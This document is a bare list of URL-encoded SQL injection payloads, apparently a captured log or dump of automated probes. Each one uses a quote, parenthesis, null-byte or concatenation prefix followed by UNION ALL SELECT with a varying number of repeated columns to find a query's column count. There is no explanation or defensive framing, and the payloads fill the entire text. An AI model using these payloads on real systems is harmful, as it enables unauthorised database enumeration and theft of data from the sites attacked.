-6636%25%27%20UNION%20ALL%20SELECT%204001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001%2C4001--%20 -7432%00%27%29%20UNION%20ALL%20SELECT%208128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128%2C8128--%20 -6242%00%27%29%20UNION%20ALL%20SELECT%202222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222%2C2222--%20 -5129%00%27%29%20UNION%20ALL%20SELECT%208568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568%2C8568--%20 -6561%00%27%29%20UNION%20ALL%20SELECT%202743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743%2C2743--%20 -6725%00%27%29%20UNION%20ALL%20SELECT%203590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590%2C3590--%20 -4352%00%27%29%20UNION%20ALL%20SELECT%204459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459%2C4459--%20 -2036%00%27%29%20UNION%20ALL%20SELECT%206961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961%2C6961--%20 -9778%00%27%29%20UNION%20ALL%20SELECT%202137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137%2C2137--%20 -7713%00%27%29%20UNION%20ALL%20SELECT%206335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335%2C6335--%20 -3522%00%27%29%20UNION%20ALL%20SELECT%205936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936%2C5936--%20 -1578%00%27%20UNION%20ALL%20SELECT%203009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009%2C3009--%20 -7845%00%27%20UNION%20ALL%20SELECT%208500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500%2C8500--%20 -8445%00%27%20UNION%20ALL%20SELECT%206945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945%2C6945--%20 -5895%00%27%20UNION%20ALL%20SELECT%208693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693%2C8693--%20 -4340%00%27%20UNION%20ALL%20SELECT%209347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347%2C9347--%20 -6156%00%27%20UNION%20ALL%20SELECT%209851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851%2C9851--%20 -4829%00%27%20UNION%20ALL%20SELECT%207024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024%2C7024--%20 -6621%00%27%20UNION%20ALL%20SELECT%208703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703%2C8703--%20 -7603%00%27%20UNION%20ALL%20SELECT%209579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579%2C9579--%20 -4825%00%27%20UNION%20ALL%20SELECT%208033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033%2C8033--%20 -3979%27%29%20WHERE%205339%3D5339%20UNION%20ALL%20SELECT%205339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339%2C5339--%20 -9419%27%29%20WHERE%206211%3D6211%20UNION%20ALL%20SELECT%206211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211%2C6211--%20 -6659%27%29%20WHERE%201531%3D1531%20UNION%20ALL%20SELECT%201531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531%2C1531--%20 -9403%27%29%20WHERE%206154%3D6154%20UNION%20ALL%20SELECT%206154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154%2C6154--%20 -7025%27%29%20WHERE%208343%3D8343%20UNION%20ALL%20SELECT%208343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343%2C8343--%20 -2168%27%29%20WHERE%203055%3D3055%20UNION%20ALL%20SELECT%203055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055%2C3055--%20 -5523%27%29%20WHERE%205923%3D5923%20UNION%20ALL%20SELECT%205923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923%2C5923--%20 -1083%27%29%20WHERE%205444%3D5444%20UNION%20ALL%20SELECT%205444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444%2C5444--%20 -4758%27%29%20WHERE%208075%3D8075%20UNION%20ALL%20SELECT%208075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075%2C8075--%20 -7912%27%29%20WHERE%201177%3D1177%20UNION%20ALL%20SELECT%201177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177%2C1177--%20 -3103%22%29%20WHERE%202918%3D2918%20UNION%20ALL%20SELECT%202918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918%2C2918--%20 -1696%22%29%20WHERE%205054%3D5054%20UNION%20ALL%20SELECT%205054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054%2C5054--%20 -8447%22%29%20WHERE%205477%3D5477%20UNION%20ALL%20SELECT%205477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477%2C5477--%20 -5506%22%29%20WHERE%205882%3D5882%20UNION%20ALL%20SELECT%205882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882%2C5882--%20 -3060%22%29%20WHERE%201008%3D1008%20UNION%20ALL%20SELECT%201008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008%2C1008--%20 -6615%22%29%20WHERE%202069%3D2069%20UNION%20ALL%20SELECT%202069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069%2C2069--%20 -3178%22%29%20WHERE%202412%3D2412%20UNION%20ALL%20SELECT%202412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412%2C2412--%20 -8930%22%29%20WHERE%202721%3D2721%20UNION%20ALL%20SELECT%202721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721%2C2721--%20 -4536%22%29%20WHERE%201540%3D1540%20UNION%20ALL%20SELECT%201540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540%2C1540--%20 -7133%22%29%20WHERE%205764%3D5764%20UNION%20ALL%20SELECT%205764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764%2C5764--%20 -4158%27%20WHERE%205410%3D5410%20UNION%20ALL%20SELECT%205410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410%2C5410--%20 -1972%27%20WHERE%209572%3D9572%20UNION%20ALL%20SELECT%209572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572%2C9572--%20 -1864%27%20WHERE%205458%3D5458%20UNION%20ALL%20SELECT%205458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458%2C5458--%20 -4579%27%20WHERE%206296%3D6296%20UNION%20ALL%20SELECT%206296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296%2C6296--%20 -4907%27%20WHERE%208831%3D8831%20UNION%20ALL%20SELECT%208831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831%2C8831--%20 -4507%27%20WHERE%204785%3D4785%20UNION%20ALL%20SELECT%204785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785%2C4785--%20 -4886%27%20WHERE%205028%3D5028%20UNION%20ALL%20SELECT%205028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028%2C5028--%20 -3774%27%20WHERE%206872%3D6872%20UNION%20ALL%20SELECT%206872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872%2C6872--%20 -6283%27%20WHERE%208307%3D8307%20UNION%20ALL%20SELECT%208307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307%2C8307--%20 -5251%27%20WHERE%206275%3D6275%20UNION%20ALL%20SELECT%206275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275%2C6275--%20 -5613%22%20WHERE%209050%3D9050%20UNION%20ALL%20SELECT%209050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050%2C9050--%20 -4743%22%20WHERE%203682%3D3682%20UNION%20ALL%20SELECT%203682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682%2C3682--%20 -8520%22%20WHERE%201537%3D1537%20UNION%20ALL%20SELECT%201537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537%2C1537--%20 -4533%22%20WHERE%203750%3D3750%20UNION%20ALL%20SELECT%203750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750%2C3750--%20 -9779%22%20WHERE%209080%3D9080%20UNION%20ALL%20SELECT%209080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080%2C9080--%20 -4025%22%20WHERE%206778%3D6778%20UNION%20ALL%20SELECT%206778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778%2C6778--%20 -3229%22%20WHERE%201378%3D1378%20UNION%20ALL%20SELECT%201378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378%2C1378--%20 -4891%22%20WHERE%205873%3D5873%20UNION%20ALL%20SELECT%205873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873%2C5873--%20 -6972%22%20WHERE%203537%3D3537%20UNION%20ALL%20SELECT%203537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537%2C3537--%20 -3068%22%20WHERE%207931%3D7931%20UNION%20ALL%20SELECT%207931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931%2C7931--%20 -4655%27%7C%7C%28SELECT%20%27AclG%27%20FROM%20DUAL%20WHERE%203196%3D3196%20UNION%20ALL%20SELECT%203196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196%2C3196--%20 -2497%27%7C%7C%28SELECT%20%27tBEJ%27%20FROM%20DUAL%20WHERE%208122%3D8122%20UNION%20ALL%20SELECT%208122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122%2C8122--%20 -5545%27%7C%7C%28SELECT%20%27qieh%27%20FROM%20DUAL%20WHERE%201044%3D1044%20UNION%20ALL%20SELECT%201044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044%2C1044--%20 -8805%27%7C%7C%28SELECT%20%27RcLg%27%20FROM%20DUAL%20WHERE%203147%3D3147%20UNION%20ALL%20SELECT%203147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147%2C3147--%20 -8683%27%7C%7C%28SELECT%20%27ZZhi%27%20FROM%20DUAL%20WHERE%207544%3D7544%20UNION%20ALL%20SELECT%207544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544%2C7544--%20 -4862%27%7C%7C%28SELECT%20%27OgAV%27%20FROM%20DUAL%20WHERE%206409%3D6409%20UNION%20ALL%20SELECT%206409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409%2C6409--%20 -2094%27%7C%7C%28SELECT%20%27YQoK%27%20FROM%20DUAL%20WHERE%207586%3D7586%20UNION%20ALL%20SELECT%207586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586%2C7586--%20 -2426%27%7C%7C%28SELECT%20%27vmNF%27%20FROM%20DUAL%20WHERE%206203%3D6203%20UNION%20ALL%20SELECT%206203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203%2C6203--%20 -1799%27%7C%7C%28SELECT%20%27Jbdx%27%20FROM%20DUAL%20WHERE%207086%3D7086%20UNION%20ALL%20SELECT%207086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086%2C7086--%20 -9116%27%7C%7C%28SELECT%20%27CKeX%27%20FROM%20DUAL%20WHERE%209883%3D9883%20UNION%20ALL%20SELECT%209883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883%2C9883--%20 -6835%27%7C%7C%28SELECT%20%27ugRy%27%20WHERE%202953%3D2953%20UNION%20ALL%20SELECT%202953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953%2C2953--%20 -5584%27%7C%7C%28SELECT%20%27EwnX%27%20WHERE%206461%3D6461%20UNION%20ALL%20SELECT%206461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461%2C6461--%20 -6898%27%7C%7C%28SELECT%20%27OnuK%27%20WHERE%206052%3D6052%20UNION%20ALL%20SELECT%206052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052%2C6052--%20 -9862%27%7C%7C%28SELECT%20%27beYk%27%20WHERE%203505%3D3505%20UNION%20ALL%20SELECT%203505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505%2C3505--%20 -7841%27%7C%7C%28SELECT%20%27LkTP%27%20WHERE%201850%3D1850%20UNION%20ALL%20SELECT%201850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850%2C1850--%20 -5048%27%7C%7C%28SELECT%20%27ezXC%27%20WHERE%201565%3D1565%20UNION%20ALL%20SELECT%201565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565%2C1565--%20 -5007%27%7C%7C%28SELECT%20%27PwhU%27%20WHERE%204006%3D4006%20UNION%20ALL%20SELECT%204006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006%2C4006--%20 -8660%27%7C%7C%28SELECT%20%27KjOG%27%20WHERE%206397%3D6397%20UNION%20ALL%20SELECT%206397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397%2C6397--%20 -3698%27%7C%7C%28SELECT%20%27YORD%27%20WHERE%201985%3D1985%20UNION%20ALL%20SELECT%201985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985%2C1985--%20 -3852%27%7C%7C%28SELECT%20%27OlUQ%27%20WHERE%202495%3D2495%20UNION%20ALL%20SELECT%202495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495%2C2495--%20 -8987%27%2B%28SELECT%20qGxX%20WHERE%206560%3D6560%20UNION%20ALL%20SELECT%206560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560%2C6560--%20 -7308%27%2B%28SELECT%20yDoo%20WHERE%201633%3D1633%20UNION%20ALL%20SELECT%201633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633%2C1633--%20 -4851%27%2B%28SELECT%20OYKC%20WHERE%201724%3D1724%20UNION%20ALL%20SELECT%201724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724%2C1724--%20 -9197%27%2B%28SELECT%20oCth%20WHERE%204069%3D4069%20UNION%20ALL%20SELECT%204069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069%2C4069--%20 -9670%27%2B%28SELECT%20pHmG%20WHERE%206215%3D6215%20UNION%20ALL%20SELECT%206215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215%2C6215--%20 -6460%27%2B%28SELECT%20fCxl%20WHERE%207840%3D7840%20UNION%20ALL%20SELECT%207840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840%2C7840--%20 -8434%27%2B%28SELECT%20Xxdd%20WHERE%206791%3D6791%20UNION%20ALL%20SELECT%206791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791%2C6791--%20 